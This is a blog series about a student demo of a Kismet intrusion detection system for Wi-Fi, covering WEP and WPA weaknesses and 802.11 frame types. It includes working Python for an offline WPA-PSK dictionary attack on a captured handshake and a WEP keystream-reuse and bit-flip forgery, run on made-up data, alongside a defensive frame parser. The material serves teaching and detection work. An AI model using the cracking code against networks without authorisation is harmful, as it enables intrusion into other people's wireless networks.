Friday, February 28, 2014

Demo of an intrusion detection system for 802.11 WLANs


Difficulties encountered and solutions (troubleshooting)

In fact, we did not run into serious trouble in this project, but we think it is necessary to talk about some of the difficulties involved.

Not being familiar with the software involved in the project was perhaps the most annoying difficulty, because none of us had any experience with Linux, into which we had to type commands. Fortunately, it did not block us. We soon got used to it by attacking a wireless network with WEP encryption.

Next we went on to decrypt a WPA network. However, this was a tough job compared with WEP because of the more complex encryption. Clearly, the enumeration method is not feasible here, because the computation would be too much. Thus we used dictionary files to help find the key. Here we met another problem: the dictionary file seemed useless. After a large amount of time, the computer was still working. In this case, we inferred that the dictionary file did not match the network under attack, so we used other dictionary files, and we did not succeed until the third one was applied.


At last we encountered the final trouble, and it nearly destroyed our project. The trouble occurred in Kismet (the detection software). At first we did not know how it came about at all, because we had locked the detection channel to the one we wanted and everything seemed correct, but we just could not figure it out. The attack was successful, but Kismet showed no information detected and no alert file was generated. We tried every method we could, but all in vain. Eventually the problem became clear: on the same channel there were also other network frames involved, which had to be eliminated. So we locked detection to our access point, and that made the project go on; Kismet could then detect perfectly. Also, the alert file is written every five minutes, so it cannot be seen immediately. In the last trial, we got everything we wanted and we can declare the success of our project.

Wednesday, February 26, 2014

Simple Introduction to WPA encryption

After the flaws of WEP were found, Wi-Fi Protected Access (WPA) was introduced to replace it and to provide a higher level of security.
Compared with WEP, WPA doubles the length of the IV (from 24 to 48 bits), and the Temporal Key Integrity Protocol (TKIP) dynamically generates a new key for each packet. The integrity check has also been upgraded: a keyed message integrity code, "Michael", protects the data, whereas WEP relied only on a CRC (Cyclic Redundancy Check), which is linear and cannot detect deliberate modification. The following figures show the configuration of the two levels of WPA keys:

1. Pairwise Key

2. Group Key
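The dictionary attack described in the troubleshooting post above (one expensive key derivation per dictionary word) and the pairwise key shown here are both demonstrated by the following Python. This is an added example, not the project's own code or any tool's source. It assumes WPA-PSK (personal mode) with a passphrase, and the handshake data (SSID, MAC addresses, nonces, EAPOL frame) is constructed in the file as made-up placeholders, not captured traffic.

```python
"""WPA/WPA2-PSK pairwise key derivation and a dictionary check against a 4-way handshake.

Added example (not from the original project). All handshake values below are
constructed placeholders, not a real capture.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # The 4096 iterations are what make every dictionary candidate expensive.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Pairwise Transient Key from the PMK, both MAC addresses and both nonces.
    # Its first 16 bytes (KCK) authenticate the handshake messages.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, descriptor_version: int) -> bytes:
    # MIC over the EAPOL-Key frame with its MIC field zeroed.
    # Key descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1 truncated.
    if descriptor_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_zeroed, mic, version, wordlist):
    """Return the first wordlist entry whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed, version), mic):
            return candidate
    return None


# --- constructed handshake (placeholders, not a real capture) ---
SSID = "ids-demo"
AA = bytes.fromhex("001122334455")          # AP (authenticator) MAC, made up
SPA = bytes.fromhex("66778899aabb")         # station (supplicant) MAC, made up
ANONCE = bytes(range(32))                   # fake ANonce
SNONCE = bytes(range(32, 64))               # fake SNonce
EAPOL_ZEROED = b"\x01\x03" + b"\x00" * 97   # fake EAPOL-Key message 2, MIC field zeroed
VERSION = 1                                 # WPA/TKIP key descriptor


def demo_mic(passphrase: str) -> bytes:
    # The MIC a station that knows `passphrase` would have placed in message 2.
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_ZEROED, VERSION)


if __name__ == "__main__":
    target = demo_mic("correct horse")
    wordlist = ["password", "12345678", "correct horse"]
    print(dictionary_attack(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, target, VERSION, wordlist))
```

The only secret is the passphrase; everything else the attack needs (SSID, MACs, nonces, the EAPOL frame and its MIC) is transmitted in the clear during the handshake, which is why capturing one handshake and then trying dictionary words offline works, and why a dictionary that does not contain the passphrase runs to the end without result.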

Simple Introduction to WEP encryption

WEP (Wired Equivalent Privacy) is a security algorithm for 802.11 wireless networks. It was widely used, but it has now been replaced by newer methods such as WPA and WPA2, because WEP has been shown to have serious weaknesses and can be broken easily and quickly. The following figure shows its structure and the process of encryption and decryption:
Obviously, the WEP seed is composed of the IV (Initialization Vector) and the key.
           WEP uses the RC4 stream cipher to encrypt the data.
           XOR is used both in encryption and in decryption.
Nowadays WEP is still in use, but it may disappear someday because its security cannot be guaranteed.
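The encapsulation described above (seed = IV || key, RC4 keystream, XOR for both directions, CRC-32 integrity check) in Python, as an added example that is not the project's code. The key, IV and payloads are constructed for illustration, and the key-ID byte that follows the IV in a real frame is left out. Besides the round trip it shows two consequences of this design that the figure alone does not: what leaks when an IV is reused, and why a linear CRC cannot stop an attacker from changing the plaintext.

```python
"""WEP frame-body encryption with RC4, plus two consequences of the design.

Added example (not the original project's code). Key, IV and payloads are
constructed here; the key-ID byte after the IV is omitted.
"""
import zlib


def rc4_keystream(seed: bytes, length: int) -> bytes:
    # Key-scheduling algorithm: permute S using the seed (IV || key).
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm: emit `length` keystream bytes.
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    # Integrity Check Value: CRC-32 of the plaintext, little-endian.
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    # Frame body = IV || ( (plaintext || ICV) XOR RC4(IV || key) )
    assert len(iv) == 3 and len(key) in (5, 13), "24-bit IV, WEP-40 or WEP-104 key"
    keystream = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(key: bytes, body: bytes) -> bytes:
    # The receiver rebuilds the same keystream from the cleartext IV and XORs it back.
    iv, ciphertext = body[:3], body[3:]
    data = xor(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    plaintext, received_icv = data[:-4], data[-4:]
    if received_icv != icv(plaintext):
        raise ValueError("ICV check failed")
    return plaintext


def keystream_reuse_leak(body1: bytes, body2: bytes) -> bytes:
    # Same IV and key => same keystream, so C1 XOR C2 = (P1||ICV1) XOR (P2||ICV2).
    # With only 2^24 IVs this happens quickly on a busy network.
    assert body1[:3] == body2[:3], "demonstration needs two frames with the same IV"
    return xor(body1[3:], body2[3:])


def flip_plaintext_bits(body: bytes, delta: bytes) -> bytes:
    # CRC-32 is affine over GF(2): crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0).
    # So without the key an attacker can XOR `delta` into the plaintext and fix
    # the encrypted ICV so the receiver still accepts the frame.
    assert len(delta) == len(body) - 7, "delta must cover the whole plaintext"
    zeros = bytes(len(delta))
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(zeros)).to_bytes(4, "little")
    return body[:3] + xor(body[3:], delta + icv_delta)


if __name__ == "__main__":
    key, iv = b"\x01\x02\x03\x04\x05", b"\x00\x00\x01"   # constructed WEP-40 key and IV
    body = wep_encrypt(key, iv, b"GET /index.html")
    print(wep_decrypt(key, body))
    forged = flip_plaintext_bits(body, xor(b"GET /index.html", b"GET /admin.html"))
    print(wep_decrypt(key, forged))   # accepted, although the attacker never had the key
```

The last function is exactly the weakness the Michael integrity code in WPA was added to close: a CRC detects random errors, not an adversary who can compute the CRC of his own change.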

Monday, February 24, 2014

Introduction to frame types, part 2

Question: What is the data frame?
Answer: It carries higher-level protocol data in the frame body.

                                                     General data frame
Not every field in this figure is present in every data frame; which fields are used depends on the particular subtype of data frame.

Question: What are the different types of data frame?
Answer:
Question: What is the use of the address fields in data frames?
Answer:


The meanings of the abbreviations are given in "description of this project".
To DS means the frame is travelling from the BSS to the DS (distribution system).
From DS means the frame is travelling from the DS to the BSS.

Question: What is the management frame?
Answer: Management frames are a large component of the 802.11 specification. Several different kinds of management frame provide services that are simple on a wired network. On a wired network it is easy to establish the identity of a station, because a network connection requires a wire to be run from a central location to the new workstation; for example, a personal visit can authenticate the new connection at the time it is brought up. On a wireless network the same jobs (finding the network, authenticating, associating) have to be done with management frames.
                                  The structure of a management frame

Question: What are the subtypes of the management frame?
Answer:
a. Beacon (announcement only, sent by the AP; no request/response)
b. Probe (request and response)
c. Authentication (request and response)
d. Association (request and response)
e. Reassociation (request and response)
f. Disassociation (notification only; no response)
g. Deauthentication (notification only; no response)

Sunday, February 23, 2014

Introduction to frame types, part 1

Question: What is a frame?
Answer: A frame is the unit of data at layer 2 of the OSI model (as introduced in "description of this project"). It is defined as the transmission unit of the link-layer protocol. A frame consists of a link-layer header followed by the packet it carries (payload and control information).

Question: How many types of frame are there, and what are they?

Answer: Three types: data frames, control frames and management frames.

Question: What is the control frame?

Answer: Control frames assist the delivery of data frames and administer access to the wireless medium. In addition, they provide MAC-layer reliability functions.
Frame Control field in control frames


Protocol version: 0 (currently the only version).

Type: control frames are assigned the type identifier 01 (binary).

Subtype: the subtype of the control frame (see the list below).

To DS and From DS bits: both are 0, because control frames are neither sent to nor received from the distribution system.

More Fragments bit: control frames are not fragmented, so this bit is 0.

Retry bit: control frames are not queued for retransmission the way management or data frames are, so this bit is always 0.

Power Management bit: indicates the power-management state of the sender.

More Data bit: used only in management and data frames, so it is set to 0.

WEP bit: control frames may not be encrypted with WEP, so the WEP bit is always 0.

Order bit: set to 0.

Question: How many subtypes of control frame are there, and what are they?
Answer: Four subtypes: Request to Send, Clear to Send, Acknowledgment and Power-Save Poll.

Request to Send (RTS)
The RTS frame is used to gain control of the medium before transmitting large frames.

Clear to Send (CTS)
The CTS frame answers the RTS frame.


Acknowledgment (ACK)
The ACK frame is used with any data transmission; it carries the positive acknowledgment required by the MAC.

Power-Save Poll (PS-Poll)

When a mobile station wakes from power-saving mode, it transmits a PS-Poll frame to the AP to retrieve any frames the AP buffered while the station was asleep.
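The Frame Control field described in this post, the management and data frames of part 2 above, and the invariants listed for control frames can all be checked with one parser. The following Python is an added example, not the project's code or Kismet's; the sample two-byte Frame Control values and the address strings are constructed by hand rather than captured. The address-field mapping for data frames (which field is DA, SA, BSSID, RA, TA for each To DS / From DS combination) follows the 802.11 standard and goes a little beyond what the page's empty answer states.

```python
"""802.11 Frame Control parser with the subtype tables of the three frame types
and the address-field roles of data frames.

Added example (not the original project's code). Sample headers below are
constructed by hand, not captured.
"""
from dataclasses import dataclass

TYPES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {
    0: "association request", 1: "association response",
    2: "reassociation request", 3: "reassociation response",
    4: "probe request", 5: "probe response", 8: "beacon",
    10: "disassociation", 11: "authentication", 12: "deauthentication",
}
CTRL_SUBTYPES = {10: "PS-Poll", 11: "RTS", 12: "CTS", 13: "ACK"}


@dataclass
class FrameControl:
    version: int
    type: int
    subtype: int
    to_ds: bool
    from_ds: bool
    more_frag: bool
    retry: bool
    pwr_mgmt: bool
    more_data: bool
    protected: bool   # the "WEP" bit
    order: bool


def parse_frame_control(fc: bytes) -> FrameControl:
    # Byte 0: protocol version (bits 0-1), type (bits 2-3), subtype (bits 4-7).
    # Byte 1: the eight flag bits, To DS being the least significant.
    b0, b1 = fc[0], fc[1]
    return FrameControl(
        version=b0 & 0x03, type=(b0 >> 2) & 0x03, subtype=(b0 >> 4) & 0x0F,
        to_ds=bool(b1 & 0x01), from_ds=bool(b1 & 0x02), more_frag=bool(b1 & 0x04),
        retry=bool(b1 & 0x08), pwr_mgmt=bool(b1 & 0x10), more_data=bool(b1 & 0x20),
        protected=bool(b1 & 0x40), order=bool(b1 & 0x80),
    )


def describe(fc: FrameControl) -> str:
    if fc.type == 0:
        return "management/" + MGMT_SUBTYPES.get(fc.subtype, f"subtype {fc.subtype}")
    if fc.type == 1:
        return "control/" + CTRL_SUBTYPES.get(fc.subtype, f"subtype {fc.subtype}")
    if fc.type == 2:
        return "data" if fc.subtype == 0 else f"data/subtype {fc.subtype}"
    return "reserved"


def control_frame_violations(fc: FrameControl) -> list:
    # Bits a control frame must leave at zero (the field list above); a non-empty
    # result is something a detector could flag as malformed.
    if fc.type != 1:
        return ["not a control frame"]
    v = []
    if fc.version != 0:
        v.append("protocol version")
    if fc.to_ds or fc.from_ds:
        v.append("To DS / From DS")
    if fc.more_frag:
        v.append("More Fragments")
    if fc.retry:
        v.append("Retry")
    if fc.more_data:
        v.append("More Data")
    if fc.protected:
        v.append("WEP")
    if fc.order:
        v.append("Order")
    return v


def data_frame_addresses(fc: FrameControl, addr1, addr2, addr3, addr4=None) -> dict:
    # The meaning of the address fields depends on the To DS / From DS bits.
    if not fc.to_ds and not fc.from_ds:      # station to station inside one BSS
        return {"DA": addr1, "SA": addr2, "BSSID": addr3}
    if fc.from_ds and not fc.to_ds:          # from the DS, through the AP, to a station
        return {"DA": addr1, "BSSID": addr2, "SA": addr3}
    if fc.to_ds and not fc.from_ds:          # from a station, through the AP, into the DS
        return {"BSSID": addr1, "SA": addr2, "DA": addr3}
    return {"RA": addr1, "TA": addr2, "DA": addr3, "SA": addr4}   # wireless DS, both set


SAMPLE_HEADERS = {   # constructed two-byte Frame Control values
    "beacon": b"\x80\x00", "deauth": b"\xc0\x00", "ack": b"\xd4\x00",
    "rts": b"\xb4\x00", "data to AP, WEP": b"\x08\x41",
}

if __name__ == "__main__":
    for name, raw in SAMPLE_HEADERS.items():
        print(f"{name:16s} {raw.hex()}  {describe(parse_frame_control(raw))}")
```

Reading the bytes this way is also how a detector such as Kismet decides what it is looking at: a deauthentication is nothing more than a management frame with subtype 12, and a station that sees them without having sent anything is the kind of event the project's IDS is meant to alert on.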